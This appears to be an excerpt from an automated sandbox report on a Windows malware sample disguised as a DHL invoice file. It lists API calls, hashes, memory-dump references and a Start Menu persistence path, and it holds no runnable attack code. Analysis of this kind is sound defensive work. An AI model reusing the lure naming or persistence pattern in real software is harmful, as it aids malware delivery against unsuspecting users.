                                            • API String ID: 973152223-0
                                            • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                            • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                            • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                            • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                            • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                            • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                            • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                            APIs
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,00000000,00424440,767D23A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                              • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                              • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                              • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,?), ref: 0040673B
                                              • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 2972824698-0
                                            • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                            • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                            • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                            • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
                                            APIs
                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                            • Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
                                            • Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
                                            • Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C
                                            APIs
                                            • CharNextA.USER32(?,004035B4,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",00000020,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",00000000,?,?,0000000A,?), ref: 00405C57
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID:
                                            • API String ID: 3213498283-0
                                            • Opcode ID: ebfd4497f4770e630c7fa17400fe2fa5f8acca5723c9a3fa4a0afe310da1b6cd
                                            • Instruction ID: 4cb6b3427928debfdf1719c4bcab7adc6768491598412c2af55c23fcd8af848d
                                            • Opcode Fuzzy Hash: ebfd4497f4770e630c7fa17400fe2fa5f8acca5723c9a3fa4a0afe310da1b6cd
                                            • Instruction Fuzzy Hash: 59C0803000C78057E550676092684677FE09E52740F584456F0C173151C13459449F1D
                                            APIs
                                            • GlobalAlloc.KERNELBASE(?,6F7A12C3,?,6F7A135F,-6F7A504B,6F7A11C0,-000000A0), ref: 6F7A12AD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: a65f789bd82a6c4dd22be4fb7803040b034344598490b4111fc15a94a26f23e6
                                            • Instruction ID: bfd3d139da8a9c9c07004e0559627f596a71cb6eb088f09c7ce0ec46cdecbb45
                                            • Opcode Fuzzy Hash: a65f789bd82a6c4dd22be4fb7803040b034344598490b4111fc15a94a26f23e6
                                            • Instruction Fuzzy Hash: 7BA00271540900DBDE415FE4B90EF0E3B21B7C6721F1380A2E306550A18B760030FB65
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                            • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                            • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                            • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                            • lstrcmpiA.KERNEL32(Call,0042A488), ref: 00404926
                                            • lstrcatA.KERNEL32(?,Call), ref: 00404932
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                              • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                              • Part of subcall function 00406587: CharNextA.USER32(?,*?|<>/":,00000000,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004065DF
                                              • Part of subcall function 00406587: CharNextA.USER32(?,?,?,00000000,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004065EC
                                              • Part of subcall function 00406587: CharNextA.USER32(?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004065F1
                                              • Part of subcall function 00406587: CharPrevA.USER32(?,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 00406601
                                            • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                              • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                              • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                              • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call
                                            • API String ID: 2624150263-243749230
                                            • Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                            • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                            • Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                            • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                            APIs
                                            • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040221D
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004022CF
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes, xrefs: 0040225D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes
                                            • API String ID: 123533781-1304730697
                                            • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                            • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                            • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                            • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                            • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                                            • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                            • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                            • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                            • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                            • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                            • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                            • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                            • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                            • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                            • GlobalAlloc.KERNEL32(?,?), ref: 00404DA5
                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                            • SetWindowLongA.USER32(?,?,00405345), ref: 00404DD6
                                            • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404DE8
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                            • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404E2E
                                            • DeleteObject.GDI32(00000110), ref: 00404E33
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                            • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                              • Part of subcall function 00404362: SendMessageA.USER32(?,?,00000001,00404192), ref: 00404370
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                            • GetWindowLongA.USER32(?,?), ref: 00404F76
                                            • SetWindowLongA.USER32(?,?,00000000), ref: 00404F84
                                            • ShowWindow.USER32(?,00000005), ref: 00404F94
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                            • SendMessageA.USER32(?,?,00000000,00000000), ref: 00405109
                                            • SendMessageA.USER32(?,00000420,00000000,?), ref: 0040512D
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                            • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                            • GlobalFree.KERNEL32(?), ref: 00405172
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                            • ShowWindow.USER32(?,00000000), ref: 0040531C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                            • ShowWindow.USER32(00000000), ref: 0040532E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                            • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                            • Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                            • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                            • GetSysColor.USER32(?), ref: 00404566
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                            • lstrlenA.KERNEL32(?), ref: 00404587
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                            • SendMessageA.USER32(00000000), ref: 00404610
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                            • SetCursor.USER32(00000000), ref: 00404693
